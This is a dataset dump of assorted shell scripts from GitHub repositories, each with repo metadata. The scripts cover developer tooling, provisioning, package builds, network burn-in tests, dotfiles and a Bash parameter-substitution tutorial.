XDEBUG_INI=/usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini

case "$1" in
    on)
        if [[ -f "${XDEBUG_INI}.deactivated" ]]; then
            mv "${XDEBUG_INI}.deactivated" "${XDEBUG_INI}"
            kill -USR2 1
        fi
        ;;
    off)
        if [[ -f "${XDEBUG_INI}" ]]; then
            mv "${XDEBUG_INI}" "${XDEBUG_INI}.deactivated"
            kill -USR2 1
        fi
        ;;
    *)
        echo "Usage: php_debug on|off"
        ;;
esac
| true
|
5fdcfdc5b08fff7a6258bddfcaa127b68feed87a
|
Shell
|
cantecim/dotfiles
|
/.bashrc
|
UTF-8
| 272
| 3.328125
| 3
|
[] |
no_license
|
export LANG=en_US.UTF-8
export LC_ALL=$LANG
export LANGUAGE=$LANG

# mkdir -p the given path and cd into it (resolving symlinks with -P).
mkcdir () {
    mkdir -p -- "$1" && cd -P -- "$1"
}

# Commit staged changes, using all arguments joined as the commit message.
commitWithMessage() {
    git commit -m "$*"
}

# Print the AWS EC2-style SHA1 fingerprint of the private key file given as $1.
ec2Fingerprint() {
    openssl pkcs8 -in $1 -nocrypt -topk8 -outform DER | openssl sha1 -c
}
| true
|
d0bb0b8bf5c883f1643ba51d7744275bfc55b35f
|
Shell
|
puddu1/codeslist
|
/ones.sh
|
UTF-8
| 61
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Print a growing run of ones: 1, 11, 111, 1111, 11111.
ones_sequence() {
    local digit=1
    local value=1
    local step
    for step in 1 2 3 4 5; do
        echo "$value"
        value="${value}${digit}"
    done
}
ones_sequence
| true
|
e4eb604e26bf23ddd726a06e8518cf423cc47871
|
Shell
|
mccart/phoenix
|
/scripts/bootstrap.sh
|
UTF-8
| 271
| 3.3125
| 3
|
[] |
no_license
|
# Bootstrap the "phoenix" app on minikube: reset the cluster, create and
# apply the app secret, then build and deploy. Restores the caller's cwd.
APP="phoenix"
STARTDIR="$PWD"
DIR=`dirname $0`
cd $DIR
#Reset Minikube
./reset.sh
# Only continue when the reset succeeded.
if [ $? -eq 0 ]
then
    #Create/Apply secret
    ./create-secret.sh $APP
    kubectl apply -f $APP-secret.yaml
    #Build and deploy application
    cd ..
    ./scripts/update.sh
fi
cd $STARTDIR
| true
|
c6b7f4274803051a9f23b109952e9e73ed4bda58
|
Shell
|
langdoc/FRechdoc
|
/forced_alignment/sox_aeneas.sh
|
UTF-8
| 387
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Trim each MONO-NNN.WAV to its first 284 seconds into song1/, then
# force-align every trimmed file against song1.txt with aeneas (EAF output).
#
# Bug fix: the original filtered `ls` output with `egrep 'MONO\-\d\d\d\.WAV+'`
# — but \d is a PCRE escape that POSIX/GNU ERE does not support, so the
# pattern never matched real files. A shell glob does the same selection
# safely and without parsing ls.
for wav in MONO-[0-9][0-9][0-9].WAV
do
	[ -e "$wav" ] || continue    # glob left literal when nothing matches
	output="${wav%.WAV}-song1.WAV"
	sox "$wav" "song1/$output" trim 0 284
done

for wav in song1/MONO*song1*WAV
do
	[ -e "$wav" ] || continue
	output="${wav%.WAV}.eaf"
	aeneas_execute_task \
	"$wav" \
	song1.txt \
	"task_language=ukr|os_task_file_format=eaf|is_text_type=plain" \
	"$output"
done
| true
|
7e135ccc66a2a7a982f3abe91760d1787d6366c6
|
Shell
|
know-ops/git-actions
|
/lib/git/commit.bash
|
UTF-8
| 164
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash

# Stage everything in the working tree and commit, prefixing the message
# given as $1 with KO_COMMIT_MSG (default "[CHORE] > ").
git_commit() {
    git add .
    # Default the prefix when KO_COMMIT_MSG is unset or empty.
    : "${KO_COMMIT_MSG:=[CHORE] > }"
    git commit -m "${KO_COMMIT_MSG}${1}"
}
| true
|
a7fe20bf390844d71f9502d9592034afdd07fa99
|
Shell
|
ajaykumar011/scripting-course
|
/escape.sh
|
UTF-8
| 114
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Demo of backslash-escape handling in output (\n producing a line break).
a=10
print_demo() {
    printf 'Value of a is %s \nThis is new line\n' "$a"
    printf 'Value of a is %s\n' "$a"
}
print_demo
| true
|
d7b609e5b9eb5a3c4c70ec8fd3718147f3978b04
|
Shell
|
petronny/aur3-mirror
|
/djv-git/PKGBUILD
|
UTF-8
| 1,101
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: N30N <archlinux@alunamation.com>
# Contributer: Jonathan Liu <net147@gmail.com>
# PKGBUILD for DJV (image-sequence/movie playback tool), built from git HEAD.

pkgname="djv-git"
provides=("djv")
pkgver=1.0.5.r65.ga631914
pkgrel=1
pkgdesc="Image sequence and movie playback and processing software for film production, VFX, and computer animation"
url="http://djv.sourceforge.net/"
license=("BSD")
arch=("i686" "x86_64")
depends=("desktop-file-utils" "qt5-base" "glew" "ffmpeg" "libjpeg" "libpng" "libtiff" "libquicktime" "openexr")
makedepends=("cmake" "qt5-tools" "portaudio")
options=("!docs")
install="${pkgname}.install"
source=("${pkgname}::git://git.code.sf.net/p/djv/git")
md5sums=("SKIP")

# Version from the latest tag (tag.rREVS.gHASH); falls back to commit
# count + short hash when the repository has no tags.
pkgver() {
	cd "${pkgname}"
	(
		set -o pipefail
		git describe --long --tags 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' ||
		printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
	)
}

# Out-of-source cmake build in a fresh ./build directory.
build() {
	rm -fr build
	mkdir build
	cd build
	cmake -D CMAKE_INSTALL_PREFIX:PATH=/usr "../${pkgname}"
	make
}

package() {
	install -Dm644 "${pkgname}/LICENSE" \
		"${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
	cd build
	make DESTDIR=${pkgdir} install
}

# vim: set noet ff=unix
| true
|
ab49820efb4b3c5bc111cc1d6a5bead1dc3e3b74
|
Shell
|
beautifularea/Master_Shell_Sed_Awk_or
|
/uploadcfg.sh
|
UTF-8
| 583
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Upload skywelld.cfg via sftp (lftp) to every host listed in the file given
# as $1 (one IP address per line).
ips=$1
FILE="skywelld.cfg"
#################
## config
#################
# NOTE(review): credentials are hardcoded; consider reading them from the
# environment or a protected config file instead.
USER=root
PASSWORD=password
IP=0
PORT=22
SRCDIR=/home/zhtian/sftpload/sftpFiles #skywelld ca proto.gz server.crl
DESDIR=/root

# Read each IP from $ips and push $FILE from $SRCDIR to $DESDIR on that host.
readIPs()
{
	while read myline
	do
		#read ips
		echo
		echo -e "\033[41;36mUPLOADING IP : \033[0m"$myline
		IP=$myline
		echo "uploading file : "${FILE}
		#:<<!
		lftp -u ${USER},${PASSWORD} sftp://${IP}:${PORT} <<EOF
cd ${DESDIR}/
lcd ${SRCDIR}
put ${FILE}
by
EOF
		#!
		echo -e "\033[41;36mUPLOADING DONE. \033[0m"
		echo
	done < $ips
}
readIPs
| true
|
03310d5e5e7a1c9aa72d500766d84de4de4cc569
|
Shell
|
JioCloudVPC/puppet-vpc
|
/build_scripts/make_userdata_vrouter.sh
|
UTF-8
| 4,351
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -xe
# Render userdata_vrouter.txt: a cloud-init user-data script that bootstraps
# a vrouter node (proxy settings, apt repos, puppet + puppet-vpc, optional
# puppet module sources / pull-request merge) and then runs puppet apply in
# a retry loop until it converges.
#
# Everything between <<EOF and the final EOF is written verbatim into
# userdata_vrouter.txt. Escaped \$ and \` defer expansion to boot time on
# the target node; unescaped ${...} are template parameters substituted now.
cat <<EOF >userdata_vrouter.txt
#!/bin/bash
date
set -x
release="\$(lsb_release -cs)"
if [ -n "${git_protocol}" ]; then
export git_protocol="${git_protocol}"
fi
if [ -n "${env_http_proxy}" ]
then
export http_proxy=${env_http_proxy}
echo http_proxy="'${env_http_proxy}'" >> /etc/environment
internal_subnet_exclusion=",${env_subnet}"
echo 'Acquire::Http::Proxy "${env_http_proxy}";' >> /etc/apt/apt.conf.d/90Proxy
export no_proxy="127.0.0.1,169.254.169.254,localhost,consul,jiocloudservices.com\${internal_subnet_exclusion}"
echo no_proxy="'127.0.0.1,169.254.169.254,localhost,consul,jiocloudservices.com\${internal_subnet_exclusion}'" >> /etc/environment
fi
if [ -n "${env_https_proxy}" ]
then
export https_proxy=${env_https_proxy}
echo https_proxy="'${env_https_proxy}'" >> /etc/environment
fi
if [ -n "${puppet_vpc_repo_url}" ];then
if [ -z "\`grep '${puppet_vpc_repo_url}' /etc/apt/sources.list\`" ];then
echo "deb [arch=amd64] ${puppet_vpc_repo_url} jiocloud main" | tee -a /etc/apt/sources.list
wget -qO - ${puppet_vpc_repo_url}/repo.key | apt-key add -
fi
fi
wget -O puppet.deb -t 5 -T 30 http://apt.puppetlabs.com/puppetlabs-release-\${release}.deb
dpkg -i puppet.deb
apt-get update
apt-get install -y puppet software-properties-common puppet-vpc
mkdir /etc/facter
mkdir /etc/facter/facts.d
if [ -n "${puppet_modules_source_repo}" ]; then
apt-get install -y git
git clone ${puppet_modules_source_repo} /tmp/rjil
if [ -n "${puppet_modules_source_branch}" ]; then
pushd /tmp/rjil
git checkout ${puppet_modules_source_branch}
popd
fi
if [ -n "${pull_request_id}" ]; then
pushd /tmp/rjil
git fetch origin pull/${pull_request_id}/head:test_${pull_request_id}
git config user.email "testuser@localhost.com"
git config user.name "Test User"
git merge -m 'Merging Pull Request' test_${pull_request_id}
popd
fi
time gem install librarian-puppet-simple --no-ri --no-rdoc;
mkdir -p /etc/puppet/manifests.overrides
cp /tmp/rjil/site.pp /etc/puppet/manifests.overrides/
mkdir -p /etc/puppet/hiera.overrides
sed -i "s/ :datadir: \/etc\/puppet\/hiera\/data/ :datadir: \/etc\/puppet\/hiera.overrides\/data/" /tmp/rjil/hiera/hiera.yaml
cp /tmp/rjil/hiera/hiera.yaml /etc/puppet
cp -Rf /tmp/rjil/hiera/data /etc/puppet/hiera.overrides
mkdir -p /etc/puppet/modules.overrides/rjil
cp -Rf /tmp/rjil/* /etc/puppet/modules.overrides/rjil/
if [ -n "${module_git_cache}" ]
then
cd /etc/puppet/modules.overrides
wget -O cache.tar.gz "${module_git_cache}"
tar xzf cache.tar.gz
time librarian-puppet update --puppetfile=/tmp/rjil/Puppetfile --path=/etc/puppet/modules.overrides
else
time librarian-puppet install --puppetfile=/tmp/rjil/Puppetfile --path=/etc/puppet/modules.overrides
fi
cat <<INISETTING | puppet apply --config_version='echo settings'
ini_setting { basemodulepath: path => "/etc/puppet/puppet.conf", section => main, setting => basemodulepath, value => "/etc/puppet/modules.overrides:/etc/puppet/modules" }
ini_setting { default_manifest: path => "/etc/puppet/puppet.conf", section => main, setting => default_manifest, value => "/etc/puppet/manifests.overrides/site.pp" }
ini_setting { disable_per_environment_manifest: path => "/etc/puppet/puppet.conf", section => main, setting => disable_per_environment_manifest, value => "true" }
INISETTING
else
puppet apply --config_version='echo settings' -e "ini_setting { default_manifest: path => \"/etc/puppet/puppet.conf\", section => main, setting => default_manifest, value => \"/etc/puppet/manifests/site.pp\" }"
fi
echo 'env='${env} > /etc/facter/facts.d/env.txt
echo 'cloud_provider='${cloud_provider} > /etc/facter/facts.d/cloud_provider.txt
while true
do
# first install all packages to make the build as fast as possible
puppet apply --detailed-exitcodes \`puppet config print default_manifest\` --config_version='echo packages' --tags package
ret_code_package=\$?
# now perform base config
puppet apply --detailed-exitcodes --debug \`puppet config print default_manifest\`
ret_code_jio=\$?
if [[ \$ret_code_jio = 1 || \$ret_code_jio = 4 || \$ret_code_jio = 6 || \$ret_code_package = 1 || \$ret_code_package = 4 || \$ret_code_package = 6 ]]
then
echo "Puppet failed. Will retry in 5 seconds"
sleep 5
else
break
fi
done
date
EOF
| true
|
371db1e6efedf15afd60212c1b15f2d82e2b0fcb
|
Shell
|
danielmarschall/uuid_mac_utils
|
/download-webdata.sh
|
UTF-8
| 1,728
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Download IEEE registry data files (OUI/MA-M/OUI-36/CID/IAB) into
# web-data/, which is protected from web access by a deny-all .htaccess.
#
# Refactor: the five identical curl / sleep / wget fallback stanzas are
# collapsed into one fetch() helper.
DIR=$( dirname "$0" )

if [ ! -d "$DIR"/web-data ]; then
	mkdir "$DIR"/web-data
	echo "Order Deny,Allow" > "$DIR"/web-data/.htaccess
	echo "Deny From All" >> "$DIR"/web-data/.htaccess
fi

# fetch URL OUTFILE
#   Try curl first; on failure wait 5 minutes and retry once with wget.
fetch() {
	local url=$1
	local out=$2
	curl "$url" --output "$out"
	if [ $? -ne 0 ]; then
		sleep 300
		wget "$url" -O "$out"
	fi
}

# Note: The Individual Address Block (IAB) is an inactive registry activity, which has been replaced by the MA-S registry product as of January 1, 2014.
fetch https://standards-oui.ieee.org/iab/iab.txt "$DIR"/web-data/iab.txt
fetch https://standards-oui.ieee.org/oui/oui.txt "$DIR"/web-data/oui.txt
fetch https://standards-oui.ieee.org/oui28/mam.txt "$DIR"/web-data/mam.txt
fetch https://standards-oui.ieee.org/oui36/oui36.txt "$DIR"/web-data/oui36.txt
fetch https://standards-oui.ieee.org/cid/cid.txt "$DIR"/web-data/cid.txt
| true
|
dd9224f2b393856a89d75fd1d919246156126a5d
|
Shell
|
ADVANTECH-Corp/advtest-burnin
|
/scripts/burnin_ethernet.sh
|
UTF-8
| 2,411
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
# Burn-in ping test for an ethernet interface.
#   $1 = interface name (e.g. eth0)
#   $2 = iteration count (0 = run forever)
#   $3 = peer name whose IP is looked up in burnin_ping_IP_config.sh
mountpoint=/home/root/advtest/burnin/log
mkdir -p ${mountpoint}/ethernet
testTime=`date +%Y%m%d.%H.%M.%S`
LOGFILE="${mountpoint}/ethernet/$1_${testTime}.txt"
# Fallback ping target when no per-interface configuration exists.
Google=216.239.32.6

ethernet_test() {
    declare -i count
    declare -i total_fail
    declare -i total_pass
    count=0
    total_fail=0
    total_pass=0
    # Pick the ping target: configured peer IP, or Google's IP by default.
    if [[ ! -e "/home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh" ]]; then
        #WEBSERVER=`ifconfig $1 |grep 'inet addr' |cut -d : -f2 | awk '{print $1}'`
        HOST_IP=$Google
        echo "Don't edit Ping IP test configuration in main menu, currently use default $1 ping Google IP \"$HOST_IP\" "
        echo "[`date +%Y%m%d.%H.%M.%S`] use default $1 ping IP \"$HOST_IP\" " >> $LOGFILE
    else
        HOST_IP=`cat /home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh |grep "$3_IP" |awk 'BEGIN {FS="="} {print $2}'`
        eth_IP=`cat /home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh |grep "$1_IP" |awk 'BEGIN {FS="="} {print $2}'`
        echo "Currently use $eth_IP ping IP $HOST_IP that has been configured in ./scripts/burnin_ping_IP_config.sh "
        echo "[`date +%Y%m%d.%H.%M.%S`] use $eth_IP ping $HOST_IP" >> $LOGFILE
    fi
    # Bounce the interface and assign the configured address.
    if ! ifconfig $1 down; then
        echo "Device $1 not found!"
    fi
    sleep 5
    if ! ifconfig $1 $eth_IP up; then
        echo "Device $1 not found!"
    fi
    if [[ $2 -eq 0 ]]; then
        # Infinite mode: one ping per second, tally pass/fail in the log.
        while true;do
            ((count++))
            echo "[`date +%Y%m%d.%H.%M.%S`] (count:$count / infinite)" >> $LOGFILE
            (ping $HOST_IP -I $1 -c 1 | tee -a $LOGFILE) 2>&1 > /dev/null
            log_result=`tail -n 2 $LOGFILE`
            # "100%" packet loss in the ping summary means the probe failed.
            if [[ $log_result == *"100%"* ]]; then
                ((total_fail++))
            else
                ((total_pass++))
            fi
            echo ">> pass/fail/count:$total_pass/$total_fail/$count" >> $LOGFILE
            echo "" >> $LOGFILE
            sleep 1
        done
    else
        # Bounded mode: $2 iterations, then mark the run complete.
        for((i=1;i<=$2;i++)) do
            ((count++))
            echo "[`date +%Y%m%d.%H.%M.%S`] (count:$count / $2)" >> $LOGFILE
            (ping $HOST_IP -I $1 -c 1 | tee -a $LOGFILE) 2>&1 > /dev/null
            log_result=`tail -n 2 $LOGFILE`
            if [[ $log_result == *"100%"* ]]; then
                ((total_fail++))
            else
                ((total_pass++))
            fi
            echo ">> pass/fail/count:$total_pass/$total_fail/$count" >> $LOGFILE
            echo "" >> $LOGFILE
            sleep 1
        done
        echo "Test is completed!!!" >> $LOGFILE
    fi
}

echo "Ethernet Log file : ${LOGFILE}"
echo "${LOGFILE} \\" >> ./cache.txt
ethernet_test $1 $2 $3
| true
|
a38ebf9e878231ac6b957a958bc354ee0f1b644a
|
Shell
|
vovarbv/akash-postgres-restore
|
/scripts/create.sh
|
UTF-8
| 407
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Idempotently create $POSTGRES_DATABASE on host "postgres" — the \gexec
# trick is used because CREATE DATABASE supports neither IF NOT EXISTS nor
# running inside a transaction.
# Check if another instance of script is running
pidof -o %PPID -x $0 >/dev/null && echo "ERROR: Script $0 already running" && exit 1

set -e

echo "Creating database"
export PGPASSWORD=$POSTGRES_PASSWORD
echo "SELECT 'CREATE DATABASE $POSTGRES_DATABASE' \
WHERE NOT EXISTS \
(SELECT FROM pg_database WHERE datname = '$POSTGRES_DATABASE')\gexec" |
psql -h postgres -p 5432 -U $POSTGRES_USER
| true
|
9beaf669e06770b43c79b0fcfe91b957019e2427
|
Shell
|
lguerrin/browsergopass
|
/browsergopass-wrapper
|
UTF-8
| 179
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Wrapper so browsers can launch browsergopass with a usable environment on
# macOS: browsers start native-messaging hosts with a minimal PATH and no TTY.

# Resolve the directory this wrapper lives in, so the real binary is found
# regardless of the caller's working directory.
DIR="$( cd "$( dirname "$0" )" && pwd )"

# Give gpg-agent/pinentry a terminal hint.
export GPG_TTY="$(tty)"

# Make Homebrew-installed tools (gpg, gopass, ...) reachable.
export PATH="$PATH:/usr/local/bin"

# "$DIR" is quoted — the original invocation broke when the install path
# contained spaces. All browser arguments are forwarded untouched.
"$DIR/browsergopass" "$@"
exit $?
| true
|
a173bb73a2114d3a9b362d7eebcdc21a65372b21
|
Shell
|
kantrootaix/shellLinux
|
/creatusers.sh
|
UTF-8
| 610
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# Batch "creation" of sequentially numbered accounts: BASE<NUM>, BASE<NUM+1>, ...
# Prompts for a lowercase base name, how many accounts to create, and the
# first index (default 1). Aborts if a candidate name already exists.
# NOTE(review): the script only echoes the account names — no useradd is run;
# confirm whether actual account creation was intended.

# Read the base name until it contains only lowercase letters.
# '|| exit 1' stops the loop on stdin EOF — the original spun forever there.
while true
do
read -p "Base de nom des comptes a crรฉer :" BASE || exit 1
if [[ "${BASE}" = +([[:lower:]]) ]]
then break
fi
done

# Read the number of accounts until it is all digits.
while true
do
read -p "Nombre d'utilisateurs a crรฉer :" NBR || exit 1
if [[ "${NBR}" = +([[:digit:]]) ]]
then break
fi
done

# First index; an empty answer (or EOF) falls back to 1.
read -p "Numero du premier utilisateur (dรฉfaut: 1) :" NUM
if [ -z "${NUM}" ]
then NUM=1
fi

COUNT=0
while (( COUNT < NBR ))
do
# Abort if the candidate login already exists (first field of /etc/passwd).
# A targeted grep replaces the original full awk scan per candidate, and a
# diagnostic on stderr replaces the original silent exit.
if grep -q "^${BASE}${NUM}:" /etc/passwd
then
echo "Compte ${BASE}${NUM} existe deja" >&2
exit 1
fi
echo "Creation du compte : ${BASE}${NUM}"
((COUNT++))
((NUM++))
done
| true
|
b243e9319c15fe5be7016167cbeabaa49324309c
|
Shell
|
dabosmo/actividad_6b
|
/ejerc4.sh
|
UTF-8
| 599
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# Split the integers in a file (one per line, default numeros.txt) into
# pares.txt / impares.txt and report each list together with its sum.
#
# Fixes over the original:
#  - reads the file once with a while/read loop instead of running
#    'cat | head -$n | tail -1' per line (O(n) instead of O(n^2))
#  - truncates the output files up front; the original appended to files from
#    previous runs and then "cleared" them with 'echo "" > file', which left a
#    spurious blank line in each file

# classify_numbers [file]
# Globals written: total_par, total_impar. Returns 1 if the file is missing.
classify_numbers() {
  local src=${1:-numeros.txt}
  total_par=0
  total_impar=0
  : > pares.txt
  : > impares.txt
  [ -f "$src" ] || return 1
  local n
  # '|| [ -n "$n" ]' also processes a final line without a trailing newline.
  while IFS= read -r n || [ -n "$n" ]; do
    [ -n "$n" ] || continue          # skip blank lines
    if [ $((n % 2)) -ne 0 ]; then
      echo "$n" >> impares.txt
      total_impar=$((total_impar + n))
    else
      echo "$n" >> pares.txt
      total_par=$((total_par + n))
    fi
  done < "$src"
  echo "Los numeros pares son: "
  cat pares.txt
  echo "Y su total es: $total_par"
  echo "Los numeros impares son: "
  cat impares.txt
  echo "Y su total es: $total_impar"
}

classify_numbers numeros.txt
| true
|
3125ae9a1d6ce01e61fe63e9b2e2192783118965
|
Shell
|
roovo/dotfiles
|
/bash/bash_profile.symlink
|
UTF-8
| 1,101
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
# vi: set ft=sh :
# ~/.bash_profile — runs for login shells: loads git completion and .bashrc,
# prints a greeting banner, and ensures a single reusable ssh-agent on Linux.
# Load in .git-completion.bash ------------------------------------
source ~/.bin/git-completion.bash
# Load in .bashrc -------------------------------------------------
# NOTE(review): $OS and the COLOR_* variables used below are presumably
# defined in ~/.bashrc — verify there.
source ~/.bashrc
# Hello Message ---------------------------------------------------
echo -e "Kernel Information: " `uname -smr`
echo -e "${COLOR_BROWN}`bash --version`"
echo -ne "${COLOR_GRAY}Uptime: "; uptime
echo -ne "${COLOR_GRAY}Server time is: "; date
# SSH agent -------------------------------------------------------
# Reuse one ssh-agent across login sessions: its environment is cached in
# $SSH_ENV and a new agent is started only when the cached one is gone.
if [[ $OS == 'linux' ]]; then
SSH_ENV="$HOME/.ssh/environment"
# Start a fresh agent and persist its environment; the sed turns the
# agent's 'echo Agent pid ...' line into a comment so sourcing stays quiet.
function start_agent {
echo "Initialising new SSH agent..."
/usr/bin/ssh-agent | sed 's/^echo/#echo/' > "${SSH_ENV}"
echo succeeded
chmod 600 "${SSH_ENV}"
. "${SSH_ENV}" > /dev/null
}
if [ -f "${SSH_ENV}" ]; then
. "${SSH_ENV}" > /dev/null
# Restart only if the cached SSH_AGENT_PID no longer matches a live ssh-agent.
ps -ef | grep ${SSH_AGENT_PID} | grep ssh-agent$ > /dev/null || {
start_agent;
}
else
start_agent;
fi
fi
# set up rvm
[[ -s ~/.rvm/scripts/rvm ]] && source ~/.rvm/scripts/rvm # Load RVM into a shell session *as a function*
| true
|
58e538d6b8ea0df5943a915f6bd3d435f928aaa1
|
Shell
|
bellatoris/sh_practice
|
/ch9_variable_revisited/parameter_substitution.sh
|
UTF-8
| 2,904
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
# Tutorial script demonstrating Bash parameter substitution forms.
# Comments translated to English; one comment line that had lost its leading
# '#' (and therefore ran as a bogus command) has been restored as a comment.

# ${parameter}
# The value of the variable 'parameter' — same as writing $parameter.
# In some contexts only the braced form ${parameter} works correctly.
# Braces are handy when concatenating string variables:

your_id=${USER}-on-${HOSTNAME}
echo "$your_id"
#
echo "Old \$PATH = $PATH"
PATH=${PATH}:/opt/bin # Append /opt/bin to $PATH for the duration of the script.
echo "New \$PATH = $PATH"

# ${parameter-default}
# If the parameter is unset, substitute 'default'.

echo ${username-$(whoami)}
# Substitutes the output of `whoami` if $username is still unset.
# Note: ${parameter:-default} is almost the same, but without the ':' a
# parameter that is merely declared (empty) keeps its empty value instead
# of triggering the default.

#!/bin/bash

username0=
# username0 has been declared, and set to the empty string.
echo "username0 = ${username0-`whoami`}"
# Not substituted.

echo "username1 = ${username1-`whoami`}"
# username1 was never declared.
# Substituted.

username2=
# username2 has been declared, and set to the empty string.
echo "username2 = ${username2:-`whoami`}"
# Substituted: the conditional test uses :- rather than -, so the empty
# value triggers the default.

# ${parameter=default}, ${parameter:=default}
# If the parameter is unset, assign the default to it.
# The two forms are nearly identical, but with ':' the default is also
# assigned when the parameter is declared but empty, as above. [1]

echo ${username=`whoami`}
# Sets the "username" variable to the output of `whoami`.

# ${parameter+alt_value}, ${parameter:+alt_value}
# If the parameter is set, use alt_value; otherwise use the null string.
# The two forms are almost identical, but differ when the parameter is
# declared-but-empty — compare the examples below.

echo "###### \${parameter+alt_value} ########"
echo

a=${param1+xyz}
echo "a = $a" # a =

param2=
a=${param2+xyz}
echo "a = $a" # a = xyz

param3=123
a=${param3+xyz}
echo "a = $a" # a = xyz

echo
echo "###### \${parameter:+alt_value} ########"
echo

a=${param4:+xyz}
echo "a = $a" # a =

param5=
a=${param5:+xyz}
echo "a = $a" # a =
# Different result from a=${param5+xyz}, isn't it?

param6=123
a=${param6+xyz}
echo "a = $a" # a = xyz

# ${parameter?err_msg}, ${parameter:?err_msg}
# If the parameter is set, use its value; otherwise print err_msg.
# Again, the two forms differ only when the parameter is declared but empty.

echo ${hi?hahah} # "hahah" goes to stderr; a non-interactive shell ABORTS here
hi=
echo ${hi?hahah} # blank line (hi is set, though empty — would only run interactively)
echo ${hello:?hahah} # hahah (':?' also triggers on an empty value)
hello=
echo ${hello:?hahah} # hahah
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.